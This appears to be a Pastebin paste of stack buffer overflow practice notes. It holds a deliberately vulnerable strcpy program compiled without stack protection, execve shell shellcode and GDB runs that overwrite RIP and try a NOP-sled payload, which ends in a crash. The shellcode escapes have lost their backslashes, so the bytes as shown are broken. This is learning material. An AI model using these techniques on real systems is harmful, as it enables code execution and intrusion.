Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:/tmp# cat /proc/sys/kernel/randomize_va_space
- 0
- GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
- 0x0000000000000000 0x0000000000000000 RWE 0x10
- root@kali:/tmp# file vuln2
- vuln2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8102b60ffa8c26f231e4184d2f49b2e7c26a18b9, not stripped
- root@kali:/tmp# lscpu | grep 'Byte Order'
- Byte Order: Little Endian
- #include <stdio.h>
- int main(int argc, char *argv[]){
- char buf[512];
- strcpy(buf, argv[1]);
- return 0;
- }
- gcc -o vuln2 vuln2.c -fno-stack-protector -z execstack
- x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05
- #include <sys/mman.h>
- #include <stdint.h>
- char code[] = "x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05";
- int main(){
- mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC);
- (*(void(*)()) code)();
- return 0;
- }
- (gdb) r $(python -c 'print "A"*526')
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /tmp/vuln2 $(python -c 'print "A"*526')
- Program received signal SIGSEGV, Segmentation fault.
- 0x0000414141414141 in ?? ()
- (gdb) x/x $rip
- 0x414141414141: Cannot access memory at address 0x414141414141
- (gdb) x/100x $rsp
- 0x7fffffffdd60: 0xffffe058 0x00007fff 0xf7fd3298 0x00000002
- 0x7fffffffdd70: 0x41414141 0x41414141 0x41414141 0x41414141
- 0x7fffffffdd80: 0x41414141 0x41414141 0x41414141 0x41414141
- 0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141
- (gdb) x/x $rbp
- 0x7fffffffdf70: 0x41414141
- (gdb) r $(python -c 'print "x90"*495+"x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05"+"x90xddxffxffxffx7f"')
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /tmp/vuln2 $(python -c 'print "x90"*495+"x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x31xc0x99x31xf6x54x5fxb0x3bx0fx05"+"x90xddxffxffxffx7f"')
- Program received signal SIGILL, Illegal instruction.
- 0x00007fffffffdf73 in ?? ()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement